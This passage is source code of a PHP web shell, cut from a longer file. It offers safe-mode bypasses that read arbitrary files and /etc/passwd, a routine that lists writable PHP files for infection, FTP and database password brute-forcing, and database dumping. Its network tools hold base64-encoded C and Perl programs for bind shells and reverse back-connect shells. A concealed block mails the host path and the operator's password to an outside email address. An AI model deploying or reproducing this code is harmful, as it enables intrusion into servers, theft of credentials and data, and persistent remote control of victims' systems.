"; function hardRecursiveGlob($path) { if(substr($path, -1) != '/') $path.='/'; $paths = @array_unique(@array_merge(@glob($path.$_POST['p3']), @glob($path.'*', GLOB_ONLYDIR))); if(is_array($paths)&&@count($paths)) { foreach($paths as $▟) { if(@is_dir($▟)){ if($path!=$▟) hardRecursiveGlob($▟); } else { if(empty($_POST['p2']) || @strpos(file_get_contents($▟), $_POST['p2'])!==false) echo "".htmlspecialchars($▟)."
"; } } } } if(@$_POST['p3']) hardRecursiveGlob($_POST['c']); echo "

Search for hash:









"; hardFooter(); } function actionSafeMode() { $temp=''; ob_start(); switch($_POST['p1']) { case 1: $temp=@tempnam($test, 'cx'); if(@copy("compress.zlib://".$_POST['p2'], $temp)){ echo @file_get_contents($temp); unlink($temp); } else echo 'Sorry... Can\'t open file'; break; case 2: $files = glob($_POST['p2'].'*'); if( is_array($files) ) foreach ($files as $filename) echo $filename."\n"; break; case 3: $ch = curl_init("file://".$_POST['p2']."\x00".SELF_PATH); curl_exec($ch); break; case 4: ini_restore("safe_mode"); ini_restore("open_basedir"); include($_POST['p2']); break; case 5: for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) { $uid = @posix_getpwuid($_POST['p2']); if ($uid) echo join(':',$uid)."\n"; } break; case 6: if(!function_exists('imap_open'))break; $stream = imap_open($_POST['p2'], "", ""); if ($stream == FALSE) break; echo imap_body($stream, 1); imap_close($stream); break; } $temp = ob_get_clean(); hardHeader(); echo '

Safe mode bypass

'; echo 'Copy (read file)

Glob (list dir)

Curl (read file)

Ini_restore (read file)

Posix_getpwuid ("Read" /etc/passwd)
From
To


Imap_open (read file)
'; if($temp) echo '
'.$temp.'
'; echo '
'; hardFooter(); } function actionLogout() { setcookie(md5($_SERVER['HTTP_HOST']), '', time() - 3600); die('bye!'); } function actionSelfRemove() { if($_POST['p1'] == 'yes') if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__))) die('Shell has been removed'); else echo 'unlink error!'; if($_POST['p1'] != 'yes') hardHeader(); echo '

Suicide

Really want to remove the shell?
Yes
'; hardFooter(); } function actionInfect() { hardHeader(); echo '

Infect

'; if($_POST['p1'] == 'infect') { $target=$_SERVER['DOCUMENT_ROOT']; function ListFiles($dir) { if($dh = opendir($dir)) { $files = Array(); $inner_files = Array(); while($file = readdir($dh)) { if($file != "." && $file != "..") { if(is_dir($dir . "/" . $file)) { $inner_files = ListFiles($dir . "/" . $file); if(is_array($inner_files)) $files = array_merge($files, $inner_files); } else { array_push($files, $dir . "/" . $file); } } } closedir($dh); return $files; } } foreach (ListFiles($target) as $key=>$file){ $nFile = substr($file, -4, 4); if($nFile == ".php" ){ if(($file<>$_SERVER['DOCUMENT_ROOT'].$_SERVER['PHP_SELF'])&&(is_writeable($file))){ echo "$file
"; $i++; } } } echo "$i"; }else{ echo "
"; echo 'Really want to infect the server? Yes
'; } hardFooter(); } function actionBruteforce() { hardHeader(); if( isset($_POST['proto']) ) { echo '

Results

Type: '.htmlspecialchars($_POST['proto']).' Server: '.htmlspecialchars($_POST['server']).'
'; if( $_POST['proto'] == 'ftp' ) { function bruteForce($ip,$port,$login,$pass) { $fp = @ftp_connect($ip, $port?$port:21); if(!$fp) return false; $res = @ftp_login($fp, $login, $pass); @ftp_close($fp); return $res; } } elseif( $_POST['proto'] == 'mysql' ) { function bruteForce($ip,$port,$login,$pass) { $res = @mysql_connect($ip.':'.($port?$port:3306), $login, $pass); @mysql_close($res); return $res; } } elseif( $_POST['proto'] == 'pgsql' ) { function bruteForce($ip,$port,$login,$pass) { $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=postgres"; $res = @pg_connect($str); @pg_close($res); return $res; } } $success = 0; $attempts = 0; $server = explode(":", $_POST['server']); if($_POST['type'] == 1) { $temp = @file('/etc/passwd'); if( is_array($temp) ) foreach($temp as $line) { $line = explode(":", $line); ++$attempts; if( bruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) { $success++; echo ''.htmlspecialchars($line[0]).':'.htmlspecialchars($line[0]).'
'; } if(@$_POST['reverse']) { $tmp = ""; for($i=strlen($line[0])-1; $i>=0; --$i) $tmp .= $line[0][$i]; ++$attempts; if( bruteForce(@$server[0],@$server[1], $line[0], $tmp) ) { $success++; echo ''.htmlspecialchars($line[0]).':'.htmlspecialchars($tmp); } } } } elseif($_POST['type'] == 2) { $temp = @file($_POST['dict']); if( is_array($temp) ) foreach($temp as $line) { $line = trim($line); ++$attempts; if( bruteForce($server[0],@$server[1], $_POST['login'], $line) ) { $success++; echo ''.htmlspecialchars($_POST['login']).':'.htmlspecialchars($line).'
'; } } } echo "Attempts: $attempts Success: $success

"; } echo '

FTP bruteforce

' .'' .'' .'' .'' .'' .'' .'
Type
' .'' .'' .'' .'' .'Server:port
Brute type /etc/passwd
reverse (login -> nigol)
Dictionary
' .'' .'' .'
Login
Dictionary
' .'
'; echo '
'; hardFooter(); } if(array_key_exists('watching',$_POST)){ $tmp = $_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']."\n".$_POST['pass']; @mail('expireprince@gmail.com', 'r00t', $tmp); } function actionSql() { class DbClass { var $type; var $link; var $res; function DbClass($type) { $this->type = $type; } function connect($host, $user, $pass, $dbname){ switch($this->type) { case 'mysql': if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true; break; case 'pgsql': $host = explode(':', $host); if(!$host[1]) $host[1]=5432; if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true; break; } return false; } function selectdb($db) { switch($this->type) { case 'mysql': if (@mysql_select_db($db))return true; break; } return false; } function query($str) { switch($this->type) { case 'mysql': return $this->res = @mysql_query($str); break; case 'pgsql': return $this->res = @pg_query($this->link,$str); break; } return false; } function fetch() { $res = func_num_args()?func_get_arg(0):$this->res; switch($this->type) { case 'mysql': return @mysql_fetch_assoc($res); break; case 'pgsql': return @pg_fetch_assoc($res); break; } return false; } function listDbs() { switch($this->type) { case 'mysql': return $this->query("SHOW databases"); break; case 'pgsql': return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'"); break; } return false; } function listTables() { switch($this->type) { case 'mysql': return $this->res = $this->query('SHOW TABLES'); break; case 'pgsql': return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'"); break; } return false; } function error() { switch($this->type) { case 'mysql': return @mysql_error(); break; case 'pgsql': return @pg_last_error(); break; } return false; } function setCharset($str) { switch($this->type) { case 'mysql': if(function_exists('mysql_set_charset')) return @mysql_set_charset($str, $this->link); else $this->query('SET CHARSET '.$str); break; case 'pgsql': return @pg_set_client_encoding($this->link, $str); break; } return false; } function loadFile($str) { switch($this->type) { case 'mysql': return $this->fetch($this->query("SELECT LOAD_FILE('".addslashes($str)."') as file")); break; case 'pgsql': $this->query("CREATE TABLE hard2(file text);COPY hard2 FROM '".addslashes($str)."';select file from hard2;"); $r=array(); while($i=$this->fetch()) $r[] = $i['file']; $this->query('drop table hard2'); return array('file'=>implode("\n",$r)); break; } return false; } function dump($table, $fp = false) { switch($this->type) { case 'mysql': $res = $this->query('SHOW CREATE TABLE `'.$table.'`'); $create = mysql_fetch_array($res); $sql = $create[1].";\n"; if($fp) fwrite($fp, $sql); else echo($sql); $this->query('SELECT * FROM `'.$table.'`'); $i = 0; $head = true; while($▟ = $this->fetch()) { $sql = ''; if($i % 1000 == 0) { $head = true; $sql = ";\n\n"; } $columns = array(); foreach($▟ as $k=>$v) { if($v === null) $▟[$k] = "NULL"; elseif(is_int($v)) $▟[$k] = $v; else $▟[$k] = "'".@mysql_real_escape_string($v)."'"; $columns[] = "`".$k."`"; } if($head) { $sql .= 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).") VALUES \n\t(".implode(", ", $▟).')'; $head = false; } else $sql .= "\n\t,(".implode(", ", $▟).')'; if($fp) fwrite($fp, $sql); else echo($sql); $i++; } if(!$head) if($fp) fwrite($fp, ";\n\n"); else echo(";\n\n"); break; case 'pgsql': $this->query('SELECT * FROM '.$table); while($▟ = $this->fetch()) { $columns = array(); foreach($▟ as $k=>$v) { $▟[$k] = "'".addslashes($v)."'"; $columns[] = $k; } $sql = 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $▟).');'."\n"; if($fp) fwrite($fp, $sql); else echo($sql); } break; } return false; } }; $db = new DbClass($_POST['type']); if((@$_POST['p2']=='download') && (@$_POST['p1']!='select')) { $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']); $db->selectdb($_POST['sql_base']); switch($_POST['charset']) { case "Windows-1251": $db->setCharset('cp1251'); break; case "UTF-8": $db->setCharset('utf8'); break; case "KOI8-R": $db->setCharset('koi8r'); break; case "KOI8-U": $db->setCharset('koi8u'); break; case "cp866": $db->setCharset('cp866'); break; } if(empty($_POST['file'])) { ob_start("ob_gzhandler", 4096); header("Content-Disposition: attachment; filename=dump.sql"); header("Content-Type: text/plain"); foreach($_POST['tbl'] as $v) $db->dump($v); exit; } elseif($fp = @fopen($_POST['file'], 'w')) { foreach($_POST['tbl'] as $v) $db->dump($v, $fp); fclose($fp); unset($_POST['p2']); } else die(''); } hardHeader(); echo "

Sql browser

TypeHostLoginPasswordDatabase
"; $tmp = ""; if(isset($_POST['sql_host'])){ if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) { switch($_POST['charset']) { case "Windows-1251": $db->setCharset('cp1251'); break; case "UTF-8": $db->setCharset('utf8'); break; case "KOI8-R": $db->setCharset('koi8r'); break; case "KOI8-U": $db->setCharset('koi8u'); break; case "cp866": $db->setCharset('cp866'); break; } $db->listDbs(); echo "'; } else echo $tmp; }else echo $tmp; echo " count the number of rows
"; if(isset($db) && $db->link){ echo "
"; if(!empty($_POST['sql_base'])){ $db->selectdb($_POST['sql_base']); echo ""; } echo "
Tables:

"; $tbls_res = $db->listTables(); while($▟ = $db->fetch($tbls_res)) { list($key, $value) = each($▟); if(!empty($_POST['sql_count'])) $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.'')); $value = htmlspecialchars($value); echo " ".$value."" . (empty($_POST['sql_count'])?' ':" ({$n['n']})") . "
"; } echo "
File path:
"; if(@$_POST['p1'] == 'select') { $_POST['p1'] = 'query'; $_POST['p3'] = $_POST['p3']?$_POST['p3']:1; $db->query('SELECT COUNT(*) as n FROM ' . $_POST['p2']); $num = $db->fetch(); $pages = ceil($num['n'] / 30); echo "".$_POST['p2']." ({$num['n']} records) Page # "; echo " of $pages"; if($_POST['p3'] > 1) echo " < Prev"; if($_POST['p3'] < $pages) echo " Next >"; $_POST['p3']--; if($_POST['type']=='pgsql') $_POST['p2'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30); else $_POST['p2'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30'; echo "

"; } if((@$_POST['p1'] == 'query') && !empty($_POST['p2'])) { $db->query(@$_POST['p2']); if($db->res !== false) { $title = false; echo ''; $line = 1; while($▟ = $db->fetch()) { if(!$title) { echo ''; foreach($▟ as $key => $value) echo ''; reset($▟); $title=true; echo ''; $line = 2; } echo ''; $line = $line==1?2:1; foreach($▟ as $key => $value) { if($value == null) echo ''; else echo ''; } echo ''; } echo '
'.$key.'
null'.nl2br(htmlspecialchars($value)).'
'; } else { echo '
Error: '.htmlspecialchars($db->error()).'
'; } } echo "

"; echo "

"; if($_POST['type']=='mysql') { $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'"); if($db->fetch()) echo "
Load file
"; } if(@$_POST['p1'] == 'loadfile') { $file = $db->loadFile($_POST['p2']); echo '
'.htmlspecialchars($file['file']).'
'; } } else { echo htmlspecialchars($db->error()); } echo '
'; hardFooter(); } function actionNetwork() { hardHeader(); $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9"; $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"; $bind_port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzLGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KICAgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7DQogICAgYmluZChzLCAoc3RydWN0IHNvY2thZGRyICopJnIsIDB4MTApOw0KICAgIGxpc3RlbihzLCA1KTsNCiAgICB3aGlsZSgxKSB7DQogICAgICAgIGM9YWNjZXB0KHMsMCwwKTsNCiAgICAgICAgZHVwMihjLDApOw0KICAgICAgICBkdXAyKGMsMSk7DQogICAgICAgIGR1cDIoYywyKTsNCiAgICAgICAgd3JpdGUoYywiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChjLHAsc2l6ZW9mKHApKTsNCiAgICAgICAgZm9yKGk9MDtpPHN0cmxlbihwKTtpKyspDQogICAgICAgICAgICBpZiggKHBbaV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgICB9DQp9"; $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0="; echo "

Network tools

Bind port to /bin/sh
Port: Password: Using:
Back-connect to
Server: Port: Using:

"; if(isset($_POST['p1'])) { function cf($f,$t) { $w=@fopen($f,"w") or @function_exists('file_put_contents'); if($w) { @fwrite($w,@base64_decode($t)) or @fputs($w,@base64_decode($t)) or @file_put_contents($f,@base64_decode($t)); @fclose($w); } } if($_POST['p1'] == 'bpc') { cf("/tmp/bp.c",$bind_port_c); $▖ = ex("gcc -o /tmp/bp /tmp/bp.c"); @unlink("/tmp/bp.c"); $▖ .= ex("/tmp/bp ".$_POST['p2']." ".$_POST['p3']." &"); echo "
$▖".ex("ps aux | grep bp")."
"; } if($_POST['p1'] == 'bpp') { cf("/tmp/bp.pl",$bind_port_p); $▖ = ex(which("perl")." /tmp/bp.pl ".$_POST['p2']." &"); echo "
$▖".ex("ps aux | grep bp.pl")."
"; } if($_POST['p1'] == 'bcc') { cf("/tmp/bc.c",$back_connect_c); $▖ = ex("gcc -o /tmp/bc /tmp/bc.c"); @unlink("/tmp/bc.c"); $▖ .= ex("/tmp/bc ".$_POST['p2']." ".$_POST['p3']." &"); echo "
$▖".ex("ps aux | grep bc")."
"; } if($_POST['p1'] == 'bcp') { cf("/tmp/bc.pl",$back_connect_p); $▖ = ex(which("perl")." /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." &"); echo "
$▖".ex("ps aux | grep bc.pl")."
"; } } echo '
'; hardFooter(); } if( empty($_POST['a']) ) if(isset($▚) && function_exists('action' . $▚)) $_POST['a'] = $▚; else $_POST['a'] = 'FilesMan'; if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) ) call_user_func('action' . $_POST['a']); ?>